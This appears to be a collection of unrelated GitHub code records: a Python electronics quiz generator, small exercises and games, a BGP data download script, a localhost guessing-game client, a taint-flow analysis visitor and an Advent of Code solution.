{choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_46():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'half wave dipole'\n\t\tchoice_b = 'elementary doublet'\n\t\tchoice_c = 'isotropic #'\n\t\tchoice_d = 'infinitesimal dipole'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following is taken as referene antenna for directive gain?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_47():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'voltage amplifier'\n\t\tchoice_b = 'current amplifier'\n\t\tchoice_c = 'power amplifier #\t'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Push-pull amplifier is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_48():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1 and 1'\n\t\tchoice_b = '1 and 0.5'\n\t\tchoice_c = '0.5 and 1'\n\t\tchoice_d = '0 and 1 #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"When the channel is noisy, producing a conditional probability of error p = 0.5,the channel capacity and entropy function would be, respectively,\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_49():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '64 us #'\n\t\tchoice_b = '6.4 us'\n\t\tchoice_c = '640 us'\n\t\tchoice_d = '0.64 us'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In CCIR - B system, the time between start of one Hsync pulse and next is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_50():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'high resistivity #'\n\t\tchoice_b = 'low resistivity'\n\t\tchoice_c = 'medium resistivity'\n\t\tchoice_d = 'both low and medium resistivity'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Counterpoise is used in coils having \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_communication_systems_section_2_1():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '3 #'\n\t\tchoice_b = '1.5'\n\t\tchoice_c = '4'\n\t\tchoice_d = '2'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"For an ideal 3000 Hz channel, S/N ratio is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_2_2():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'choice1'\n\t\tchoice_b = 'choice2'\n\t\tchoice_c = 'choice3'\n\t\tchoice_d = 'choice4'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"","repo_name":"siliconcortex/curiousweb","sub_path":"est/indiabix.py","file_name":"indiabix.py","file_ext":"py","file_size_in_byte":74663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72879325924","text":"def create_matrix(size: int):\n mat = []\n for _ in range(size):\n nested_list = [x for x in input().split()]\n mat.append(nested_list)\n return mat\n\n\nrows, coll = map(int, input().split())\nmatrix = create_matrix(rows)\ncounter = 0\n\nfor row in range(rows - 1):\n\n for col in range(coll - 1):\n one = matrix[row][col]\n two = matrix[row][col + 1]\n three = matrix[row + 1][col]\n four = matrix[row + 1][col + 1]\n if len({one, two, three, four}) == 1:\n counter += 1\nprint(counter)\n","repo_name":"Dan-Mihaylov/Software-Uni-Courses","sub_path":"Advanced/Multidimentional Lists Exercise One/03_2x2_squares_in_matrix.py","file_name":"03_2x2_squares_in_matrix.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7596585413","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.optimize import curve_fit\r\n\r\n\r\ndef func(x, a, b):\r\n return x * a + b\r\n\r\n\r\n# xdata = np.array([0, 1075000, 2150000, 3050000, 4075000])\r\n# ydata = np.array([970394214, 970852352, 971328705, 971559258, 971712612])\r\n\r\n# popt, pcov = curve_fit(func, xdata, ydata, p0=[4.77129651e-01, 9.21051620e+08]) # popt - значения коэффициентов, pcov - ковариационная матрица\r\n# print(popt)\r\n# errors = np.sqrt(np.diag(pcov))\r\n# print(errors)\r\n# yteor = func(xdata, popt[0], popt[1])\r\n# plt.plot(xdata, ydata)\r\n# plt.plot(xdata, yteor)\r\n# plt.show()\r\n\r\nout = open('interp.txt', 'w')\r\ndata = open('phases.txt', 'r')\r\nX = []\r\ny = []\r\ngroup = 0\r\ns = data.readline()\r\nwhile len(s) > 0:\r\n type, gr, pr, mod = s.split()\r\n if type == 'group':\r\n if gr != '170':\r\n print(group, end='\\t', file=out)\r\n popt, pcov = curve_fit(func, np.array(X), np.array(y), p0=[4.77129651e-01, 9.21051620e+08])\r\n print(popt[0], np.sqrt(np.diag(pcov))[0], sep='\\t', file=out)\r\n print(popt)\r\n X = []\r\n y = []\r\n group = gr\r\n X.append(int(pr))\r\n y.append(int(float(mod)))\r\n s = data.readline()\r\n\r\n","repo_name":"Hacker1337/nonlinear-deformation","sub_path":"old multifile system/interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34855383171","text":"import sys, os\n\nsys.path.append( str(os.getcwd()) + \"/../../src\" )\nsys.path.append( str(os.getcwd()) + \"/../../interfaces\" )\nsys.path.append( str(os.getcwd()) + \"/../src\" )\nsys.path.append( str(os.getcwd()) + \"/../interfaces\" )\n\nfrom clear_screen_tool import Clear_Screen_Tool\nfrom are_you_sure_tool import Are_You_Sure_Tool\nfrom printer import Printer\nfrom ask_tool import Ask_Tool\nfrom time_tool import Time_Tool\nfrom MRT_interface import MRT_Interface\nfrom ES_interface import ES_Interface\n\nclass Download_MRT_Files():\n\tP = None\n\tCST = None\n\tARST = None\n\tMRTI = None\n\tESI = None\n\n\tdef __init__( self ):\n\t\tself.CST = Clear_Screen_Tool()\n\t\tself.CST.clear_screen()\n\n\t\t#Tool to print output\n\t\tself.P = Printer()\n\n\t\t#Tool to ask Yes or No\n\t\tself.ARST = Are_You_Sure_Tool( P = self.P )\n\n\t\t#Tool to get user input\n\t\tself.AT = Ask_Tool( P = self.P )\n\n\t\t#Tool to measure time / get intervals / get time_epoch\n\t\tself.TT = Time_Tool( P = self.P )\n\n\t\t#Interface to ElasticSearch : download / upload routes, withdrawns, stats and state change messages\n\t\tself.ESI = ES_Interface( P = self.P, include_state_change = False, include_withdraw = False, include_route = False, include_stats = False )\n\n\t\t#Interface to RouteViews, RIPE and ElasticSearch : index, delete, download and modify MRT files from RouteViews and RIPE RRCs\n\t\tself.MRTI = MRT_Interface( P = self.P, ESI = self.ESI )\n\n\tdef run( self ):\n\t\tself.P.write(\"------------------------------------------------------------\")\n\t\tRRC_number = self.AT.ask( question = \"RRC_number:\", expect_int = True )\n\t\tself.P.write( \"RRC_number is \" + str(RRC_number) )\n\n\t\t#Get time interval\n\t\ttime_interval = self.TT.get_time_interval( time_start_str = \"2018-01-01\", time_end_str = \"2018-01-01 08:00:00\" )\n\t\tself.P.write( \"time_interval is \" + str(time_interval) )\n\n\t\t#Retrieve download pahts of MRT files from ElasticSearch index bgp-links\n\t\tdownload_paths = self.MRTI.get_download_paths( RRC_number = RRC_number, time_interval = time_interval )\n\t\t\n\t\tif len( download_paths ) == 0:\n\t\t\tself.P.write( \"Download_And_Print: run: len( download_paths ) == 0\", color = 'red' )\n\t\t\treturn\n\n\t\tself.P.write( \"found following download_paths:\" )\n\t\tfor download_path in download_paths:\n\t\t\tself.P.write( \"\\t\" + download_path )\n\t\t\t\n\t\t#Select first download path in list\n\t\tdownload_path = download_paths[0]\n\t\tself.P.write( \"download link \" + str(download_path) )\n\n\t\t#Download MRT records\n\t\trecords = self.MRTI.download_MRT_records( download_path = download_path )\n\n\t\t#Print MRT records\n\t\tfor record in records:\n\t\t\tself.P.write( \"Show next record?\" )\n\t\t\tif self.ARST.ask_are_you_sure() is False:\n\t\t\t\tbreak\n\n\t\t\tdata_JSON = self.MRTI.get_data_JSON( record = record )\n\t\t\tself.P.write( \"Raw Data\", color = 'green' )\n\t\t\tself.P.write_JSON( data_JSON = data_JSON )\n\n\t\t\tif self.MRTI.is_update_record( record = record ):\n\t\t\t\troutes = self.MRTI.get_update_routes( record = record )\n\t\t\t\t\n\t\t\t\tself.P.write( \"Processed Data\", color = 'green' )\n\t\t\t\tfor route in routes:\n\t\t\t\t\tself.P.write_JSON( data_JSON = route )\n\n\t\t\telif self.MRTI.is_RIB_record( record = record ) is True:\n\t\t\t\troutes = self.MRTI.get_RIB_routes( record = record )\n\t\t\t\t\n\t\t\t\tself.P.write( \"Processed Data\", color = 'green' )\n\t\t\t\tfor route in routes:\n\t\t\t\t\tself.P.write_JSON( data_JSON = route )\n\nDownload_MRT_Files().run()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"asemwal/thesis-project","sub_path":"bgp-python/examples/executables/run_download_MRT_files.py","file_name":"run_download_MRT_files.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6620362893","text":"from PyQt5.QtWidgets import QApplication, QDialog, QProgressBar, QVBoxLayout, QProgressDialog\nimport time\n\nclass Example(QDialog):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.progress = QProgressBar(self)\n self.progress.setMinimum(0)\n self.progress.setMaximum(0)\n vbox = QVBoxLayout()\n vbox.addWidget(self.progress)\n self.setLayout(vbox)\n self.setGeometry(300, 300, 250, 150)\n self.show()\n\n def run(self):\n dialog = QProgressDialog(self)\n dialog.setLabelText(\"Loading...\")\n dialog.setRange(0, 0)\n dialog.show()\n for i in range(101):\n time.sleep(0.1) # giả lập quá trình tiến trình\n dialog.setValue(i)\n dialog.close()\n\nif __name__ == '__main__':\n app = QApplication([])\n ex = Example()\n ex.run()\n app.exec_()","repo_name":"Tino-25/DACN2_ComputerVision","sub_path":"ComputerVision_background_desktop/test_show_loading.py","file_name":"test_show_loading.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29159870203","text":"import socket\r\nimport time\r\nimport protocol\r\n\r\n\r\ndef wczytaj_liczbe():\r\n while True:\r\n num_l = input('Podaj nieparzysta liczbe <= 255: ')\r\n if num_l.isdigit() == True:\r\n num_l = int(num_l)\r\n if num_l % 2 == 1:\r\n return num_l\r\n else:\r\n continue\r\n else:\r\n print(\"Zly format danych!\")\r\n\r\n\r\nHOST = '127.0.0.1' #Adres IP serwera\r\nPORT = 65432 #Port uzywany przez serwer\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\nwhile True: # Klient czeka aż serwer będzie dostępny + wyjątki\r\n try:\r\n s.connect((HOST, PORT))\r\n break\r\n except ConnectionRefusedError:\r\n print(\"...\")\r\n time.sleep(5)\r\n\r\ntry:\r\n print(\"Wysylam zadanie wejscia na serwer\")\r\n messagesend = protocol.dataencode(0, 1, 0, 0, 0)\r\n s.send(messagesend)\r\n messagereceive = s.recv(1024)\r\n decodemessagereceive = protocol.datadecode(messagereceive)\r\n\r\n if decodemessagereceive['operation'] == 0 and decodemessagereceive['answer'] == 0:\r\n id = protocol.d['id']\r\n print(\"Otrzymane id: {}\".format(id))\r\n while True:\r\n num_l = wczytaj_liczbe() # zastosowanie funkcji wczytaj_liczbe()\r\n if num_l <= 255:\r\n break\r\n else:\r\n print(\"Niepoprawna liczba!\")\r\n messagesend = protocol.dataencode(1, 0, id, num_l, 0)\r\n s.send(messagesend)\r\n print(\"Wyslano wiadomosc z liczba prob \")\r\n messagereceive = s.recv(1024)\r\n decodemessagereceive = protocol.datadecode(messagereceive)\r\n\r\n if decodemessagereceive['operation'] == 1 and decodemessagereceive['answer'] == 1:\r\n liczba_prob = protocol.d['number']\r\n print(\"Liczba prob: {}\".format(liczba_prob))\r\n print(\"Zakres tajnej liczby <1,25>\")\r\n while liczba_prob > 0: # Petla rozgrywki\r\n try:\r\n while True:\r\n num_s = int(input('Podaj liczbe <= 255: '))\r\n if num_s <=255:\r\n break\r\n else:\r\n print(\"Niepoprawna liczba!\")\r\n messagesend = protocol.dataencode(2, 0, id, num_s, 0)\r\n s.send(messagesend)\r\n messagereceive = s.recv(1024)\r\n decodemessagereceive = protocol.datadecode(messagereceive)\r\n if decodemessagereceive['operation'] == 2 and decodemessagereceive['answer'] == 1:\r\n liczba_prob -= 1\r\n print(\"Nie trafiles, proboj dalej. Pozostalo {} prob!\".format(liczba_prob))\r\n elif decodemessagereceive['operation'] == 2 and decodemessagereceive['answer'] == 2:\r\n print(\"Trafiles! \")\r\n break\r\n elif decodemessagereceive['operation'] == 2 and decodemessagereceive['answer'] == 3:\r\n print(\"Przegrales, przeciwnik byl szybszy! \")\r\n break\r\n except ConnectionResetError:\r\n print(\"Nastapilo rozlaczenie! \")\r\n break\r\n\r\n else:\r\n print(\"Nie mozna uzyskac id\")\r\n\r\nexcept ConnectionResetError:\r\n print(\"Nastapilo rozlaczenie! \")\r\nprint(\"Koniec Gry! \")","repo_name":"Tarnac/TS_TCP_Binary_Client-Server","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24730155738","text":"import random, copy, time\ncard_Deck = {'A': '1', 'A': '11', '2': '2', '3': '3', '4': '4', '5': '5', '6': '6',\n '7': '7', '8': '8', '9': '9', '10': '10', 'J': '10',\n 'Q': '10', 'K': '10'}\nprint(\"Welcome to BLACKJACK!\\n\\n\")\ntime.sleep(1.5)\nprint(\"Attempt to beat the dealer by getting as close to 21 as possible, without going over.\\n\")\ntime.sleep(3)\n\n#players turn\nloop_One = True\nloop_Two = True\nloop_Three = True\nwhile loop_One:\n player_Cards = []\n player_Score = []\n dealer_Cards = []\n dealer_Score = []\n did_Player_Bust = False\n did_Dealer_Bust = False\n player_Cards.append(random.choice(list(card_Deck)))\n player_Cards.append(random.choice(list(card_Deck)))\n dealer_Cards.append(random.choice(list(card_Deck)))\n dealer_Cards.append(random.choice(list(card_Deck)))\n print(\"You are dealt two cards face down, that only you can see.\\nThe dealer is also dealt two cards.\\nOne of the dealer's cards was dealt face up.\\n\\n\")\n time.sleep(3)\n while loop_Two:\n print('The cards you have are: ' + str(player_Cards) + '.')\n time.sleep(3)\n player_Score.clear()\n for cards in player_Cards:\n player_Score.append(int(card_Deck.get(cards, 0)))\n for x in range(0, len(player_Score)):\n player_Score[x] = int(player_Score[x])\n player_Score_Sum = sum(player_Score)\n print(\"Your card's total points are: \" + str(player_Score_Sum) + \".\\n\")\n time.sleep(3)\n print(\"The dealer has a ['\" + dealer_Cards[0] + \"'] showing.\")\n while loop_Three:\n if player_Cards == ['A', 'K'] or player_Cards == ['A', 'Q'] or player_Cards == ['A', 'J'] or player_Cards == ['A', '10'] or player_Cards == ['K', 'A'] or player_Cards == ['Q', 'A'] or player_Cards == ['J', 'A'] or player_Cards == ['10', 'A']:\n time.sleep(2)\n loop_One = False\n loop_Two = False\n loop_Three = False\n if player_Score_Sum >= 22:\n print('Bust!')\n did_Player_Bust = True\n time.sleep(2)\n print('\\nThe dealer reveals his cards.\\n')\n time.sleep(2)\n loop_One = False\n loop_Two = False\n loop_Three = False\n if player_Score == 21:\n time.sleep(2)\n print('\\nThe dealer reveals his cards.\\n')\n time.sleep(2)\n loop_One = False\n loop_Two = False\n loop_Three = False\n if player_Score_Sum <= 21:\n player_Choice = input('Do you want another card?\\n')\n if player_Choice == 'y':\n player_Cards.append(random.choice(list(card_Deck)))\n print('\\nYou hit!\\n')\n print('The cards you have are: ' + str(player_Cards) + '.')\n time.sleep(3)\n player_Score.clear()\n for cards in player_Cards:\n player_Score.append(int(card_Deck.get(cards, 0)))\n for x in range(0, len(player_Score)):\n player_Score[x] = int(player_Score[x])\n player_Score_Sum = sum(player_Score)\n print(\"Your card's total points are: \" + str(player_Score_Sum) + \".\\n\")\n continue\n elif player_Choice == 'n':\n time.sleep(2)\n print('\\nThe dealer reveals his cards.\\n')\n time.sleep(2)\n loop_One = False\n loop_Two = False\n loop_Three = False\n else:\n print(\"Enter 'y' for yes or 'n' for no.\")\n continue\n #dealers turn\n print('The cards the dealer has are: ' + str(dealer_Cards))\n dealer_Score.clear()\n for cards in dealer_Cards:\n dealer_Score.append(int(card_Deck.get(cards, 0)))\n for x in range(0, len(dealer_Score)):\n dealer_Score[x] = int(dealer_Score[x])\n dealer_Score_Sum = sum(dealer_Score)\n time.sleep(1)\n print(\"The dealer's card's points are: \" + str(dealer_Score_Sum))\n\n #dealers turn (hit or stay)\n while True:\n if did_Player_Bust == True:\n break\n if int(dealer_Score_Sum) < 17:\n dealer_Cards.append(random.choice(list(card_Deck)))\n time.sleep(2)\n print('The dealer hits!\\n')\n print('The cards the dealer has are: ' + str(dealer_Cards))\n dealer_Score.clear()\n for cards in dealer_Cards:\n dealer_Score.append(int(card_Deck.get(cards, 0)))\n for x in range(0, len(dealer_Score)):\n dealer_Score[x] = int(dealer_Score[x])\n dealer_Score_Sum = sum(dealer_Score)\n print(\"The dealer's card's points are: \" + str(dealer_Score_Sum))\n continue\n if int(dealer_Score_Sum) > 21:\n did_Dealer_Bust = True\n break\n else:\n break\n\n #results\n time.sleep(3)\n if player_Cards == ['A', 'K'] or player_Cards == ['A', 'Q'] or player_Cards == ['A', 'J'] or player_Cards == ['A', '10'] or player_Cards == ['K', 'A'] or player_Cards == ['Q', 'A'] or player_Cards == ['J', 'A'] or player_Cards == ['10', 'A']:\n print('Blackjack!\\nYou won!')\n if did_Player_Bust == True:\n print('You lost!')\n if did_Player_Bust == False and did_Dealer_Bust == True:\n print('The dealer folded!\\nYou won!')\n else:\n if player_Score_Sum < dealer_Score_Sum:\n print('You lost!')\n if player_Score_Sum > dealer_Score_Sum and did_Player_Bust == False:\n print('You won!')\n if player_Score_Sum == dealer_Score_Sum:\n print(\"It's a push!\")\n\n #replay\n time.sleep(3)\n replay = input('\\nDo you want to play again?\\n')\n if replay == 'y':\n player_Cards.clear()\n dealer_Cards.clear()\n player_Score.clear()\n dealer_Score.clear()\n player_Score_Sum = 0\n dealer_Score_Sum = 0\n loop_One = True\n loop_Two = True\n loop_Three = True\n print('\\n\\n\\n')\n continue\n if replay == 'n':\n break\n","repo_name":"dosbern/Blackjack_Game","sub_path":"Blackjack_Game/Blackjack_Game.py","file_name":"Blackjack_Game.py","file_ext":"py","file_size_in_byte":6249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18749438475","text":"from visitors import Visitor\nfrom utilities import GreekLetters\nfrom instantiation_visitor import FlowCategory, CallArgKeys as InstantiationCallArgKeys\n\n\nclass TaintQualifer:\n TAINTED = \"tainted\"\n UNTAINTED = \"untainted\"\n labels = GreekLetters.greek_letters_lowercase\n\n\nclass CallArgKeys(InstantiationCallArgKeys):\n Call_arg_TaintQualifer = \"Call_arg_TaintQualifier\"\n\n\nclass TaintedFlowVisitor(Visitor):\n\n def __init__(self, ast):\n super(TaintedFlowVisitor, self).__init__(ast)\n self.super = super(TaintedFlowVisitor, self)\n self._labels = filter(None, TaintQualifer.labels)\n self._labels_map = dict()\n self.sources = list()\n self.sinks = list()\n self.sanitizers = list()\n\n @property\n def labels(self):\n return self._labels_map\n\n def next_label(self):\n next_greek_letter = next(self._labels)\n greek_letters_list = list(GreekLetters.greek_letters_lowercase)\n greek_letters_list.remove(next_greek_letter)\n GreekLetters.greek_letters_lowercase = tuple(greek_letters_list)\n return next_greek_letter\n\n def check_for_Call_arg(self, node):\n if CallArgKeys.Call_arg in node and CallArgKeys.Call_arg_CallFlowCategory in node:\n arg_flow_category = node.pop(CallArgKeys.Call_arg_CallFlowCategory)\n node[CallArgKeys.Call_arg_TaintQualifer] = {\n FlowCategory.SOURCE: TaintQualifer.TAINTED,\n FlowCategory.SANITIZER: TaintQualifer.TAINTED,\n FlowCategory.REGULAR: TaintQualifer.TAINTED,\n FlowCategory.SINK: TaintQualifer.UNTAINTED\n }[arg_flow_category]\n taint_qualifier = self.next_label()\n\n self._labels_map[node[CallArgKeys.Call_arg]\n ] = taint_qualifier\n\n def assign_taint_qualifier(self, node, name):\n if not name in self._labels_map:\n node_flow_category = node[FlowCategory.__name__]\n\n if node_flow_category == FlowCategory.SOURCE:\n self.sources.append(name)\n # taint_qualifier = TaintQualifer.TAINTED\n\n elif node_flow_category == FlowCategory.SANITIZER:\n self.sanitizers.append(name)\n # taint_qualifier = TaintQualifer.UNTAINTED\n\n elif node_flow_category == FlowCategory.SINK:\n self.sinks.append(name)\n # taint_qualifier = TaintQualifer.UNTAINTED\n\n # elif node_flow_category == FlowCategory.REGULAR:\n taint_qualifier = self.next_label()\n\n self._labels_map[name] = taint_qualifier\n\n node[TaintQualifer.__name__] = self._labels_map[name]\n\n def visit_Name(self, node):\n name = self.super.visit_Name(node)\n self.assign_taint_qualifier(node, name)\n\n def visit_Call_args(self, nodes):\n for node in nodes:\n self.check_for_Call_arg(node)\n self.super.visit_Call_args(nodes)\n\n def visit_BinOp(self, node):\n self.check_for_Call_arg(node)\n self.super.visit_BinOp(node)\n\n def check_for_Call_arg_CallFlowCategory(self, node):\n if CallArgKeys.Call_arg_CallFlowCategory in node:\n del node[CallArgKeys.Call_arg_CallFlowCategory]\n\n def visit_Constant(self, node):\n node[TaintQualifer.__name__] = TaintQualifer.UNTAINTED\n self.check_for_Call_arg(node)\n self.check_for_Call_arg_CallFlowCategory(node)\n","repo_name":"vvasylkovskyi/SW-Security-Static-Analysis-Tool","sub_path":"tf_visitor.py","file_name":"tf_visitor.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27755149598","text":"with open(\"./test.txt\") as file_object:\n contents = file_object.read()\n print(contents.strip())\n\nwith open(\"./test.txt\") as file_content:\n '''\n This will read line by line\n '''\n for line in file_content:\n # print like this will result in extra empty line between lines, so in order to remove that line we can do\n # print(line)\n print(line.strip('\\n'))\n\n# read birthday in pi\nwith open(\"./pi_one_million.txt\") as file_content:\n contents = file_content.read()\n my_birthday = \"19900904\"\n if my_birthday in contents:\n print(\"my birthday is in pi\")\n else:\n print(\"my birthday is not in pi\")\n\ntry:\n with open(\"./test_fail.txt\") as file_object:\n '''\n This will raise error as file not find\n '''\n contents = file_object.read()\n print(contents.strip())\nexcept Exception:\n print(\"no such file\")\n","repo_name":"ericwang094/python_notes","sub_path":"python_intro/io/python_io.py","file_name":"python_io.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5068461543","text":"from typing import List, Union, Tuple, NamedTuple, Optional\n\nfrom collections import deque\n\nimport re\n\n\n# class Rule(NamedTuple):\n# num: int\n# value: Union[int, str]\n\n\nRuleSet = List[List[List[Union[int, str]]]]\n\n\ndef parse_input(file: str) -> Tuple[RuleSet, List[str]]:\n with open(file, 'r') as f:\n raw = f.read()\n split_raw = raw.split('\\n\\n')\n num_rules = len(split_raw[0].split('\\n'))\n rules: RuleSet = [[] for _ in range(num_rules)]\n\n # rules\n for rule in split_raw[0].split('\\n'):\n rule = rule.strip()\n num_rule = int(re.findall(r'\\d+', rule)[0])\n if \"|\" in rule:\n try:\n first_set: List[int] = [int(num) for num in rule.split(\":\")[1].split(\"|\")[0].split()]\n rules[num_rule].append(first_set)\n second_set: List[int] = [int(num) for num in rule.split(\":\")[1].split(\"|\")[1].split()]\n rules[num_rule].append(second_set)\n except IndexError:\n rules[num_rule].append(first_set) # no second set\n elif ('\"a\"' in rule) or ('\"b\"' in rule):\n first_set: str = rule.split(\":\")[1].split()[0].strip('\"')\n rules[num_rule].append([first_set])\n else:\n first_set: List[int] = [int(num) for num in rule.split(\":\")[1].split()]\n rules[num_rule].append(first_set)\n\n # received messages\n messages = [msg.strip() for msg in split_raw[1].split('\\n')]\n return rules, messages\n\n\n#rules, messages = parse_input('data/day19_test2')\n\ndef crawl(rules:RuleSet, rule_to_check: int = 0) -> List[str]:\n res = []\n if rules[rule_to_check][0][0] == 'b':\n return ['b']\n elif rules[rule_to_check][0][0] == 'a':\n return ['a']\n\n for rule in rules[rule_to_check]:\n if len(rule) == 1:\n res += crawl(rules, rule[0])\n elif len(rule) == 2: # this is not a general solution! (we could have 4 length rule or more)\n option1 = crawl(rules, rule[0])\n option2 = crawl(rules, rule[1])\n res += [x + y for x in option1 for y in option2]\n elif len(rule) == 3:\n option1 = crawl(rules, rule[0])\n option2 = crawl(rules, rule[1])\n option3 = crawl(rules, rule[2])\n res += [x + y + z for x in option1 for y in option2 for z in option3]\n\n return res\n\n\n#possibilities = crawl(rules, 0)\n\n# for test\n# assert len([item for item in messages if item in possibilities]) == 2\n\n#print(len([item for item in messages if item in possibilities]))\n\n## Part 2 ##\n\nclass Rule(NamedTuple):\n value: int\n char: Optional[str] = None\n\n\ndef parse_input2(file: str) -> Tuple[RuleSet, List[str]]:\n with open(file, 'r') as f:\n raw = f.read()\n split_raw = raw.split('\\n\\n')\n num_rules = len(split_raw[0].split('\\n'))\n rules: RuleSet = [[] for _ in range(num_rules)]\n\n # rules\n for rule in split_raw[0].split('\\n'):\n rule = rule.strip()\n num_rule = int(re.findall(r'\\d+', rule)[0])\n # replacing section\n if num_rule == 8:\n rule = \"8: 42 | 42 8\"\n elif num_rule == 11:\n rule = \"11: 42 31 | 42 11 31\"\n\n if \"|\" in rule:\n try:\n first_set: List[Rule] = [Rule(int(num)) for num in rule.split(\":\")[1].split(\"|\")[0].split()]\n rules[num_rule].append(first_set)\n second_set: List[Rule] = [Rule(int(num)) for num in rule.split(\":\")[1].split(\"|\")[1].split()]\n rules[num_rule].append(second_set)\n except IndexError:\n rules[num_rule].append(first_set) # no second set\n elif ('\"a\"' in rule) or ('\"b\"' in rule):\n first_set: str = rule.split(\":\")[1].split()[0].strip('\"')\n rules[num_rule].append([Rule(num_rule, first_set)])\n else:\n first_set: List[Rule] = [Rule(int(num)) for num in rule.split(\":\")[1].split()]\n rules[num_rule].append(first_set)\n\n # received messages\n messages = [msg.strip() for msg in split_raw[1].split('\\n')]\n return rules, messages\n\n\nrules, messages = parse_input2('data/day19_test')\n#possibilities = crawl(rules, 0)\n\n\"\"\"\nGenerating all the possibilities won't work here (because of loops).\nWe have to check each message against the rules. I got help from other\nsolutions.\n\"\"\"\ndef check(s: str, rules: List[List[List[Rule]]]) -> bool:\n \"\"\"\n Returns True if s is valid for rules[0].\n \"\"\"\n q = deque([(s, [Rule(0)])])\n\n while q:\n s, rule_ids = q.popleft()\n\n if not s and not rule_ids:\n return True\n elif not s or not rule_ids:\n continue\n elif len(rule_ids) > len(s): # each rule can only match 1 character\n continue\n\n rule = rules[rule_ids[0].value][0][0]\n rule_ids = rule_ids[1:]\n\n if rule.char and s[0] == rule.char:\n q.append((s[1:], rule_ids))\n elif rule.char and not rule_ids:\n continue\n else:\n for subrule_ids in rules[rule.value]:\n q.append((s, subrule_ids + rule_ids))\n return False\n\nvalid = 0\nfor i, s in enumerate(messages):\n print(i, s)\n if check(s, rules):\n valid += 1\n\nprint(valid)","repo_name":"oren0e/aoc-2020","sub_path":"day19.py","file_name":"day19.py","file_ext":"py","file_size_in_byte":5214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10692818540","text":"import torch\n\nfrom const import *\n\n\ndef reps2idx(responses, word2idx):\n return [[word2idx[w] if w in word2idx else UNK for w in rep] for rep in responses]\n\n\ndef uttes2idx(utterances, word2idx):\n return [[[word2idx[w] if w in word2idx else UNK for w in u] for u in utte] for utte in utterances]\n\n\nclass Dictionary(object):\n def __init__(self):\n self.word2idx = {\n WORD[PAD]: PAD,\n WORD[UNK]: UNK,\n }\n self.idx = len(self.word2idx)\n\n def add(self, word):\n if self.word2idx.get(word) is None:\n self.word2idx[word] = self.idx\n self.idx += 1\n\n 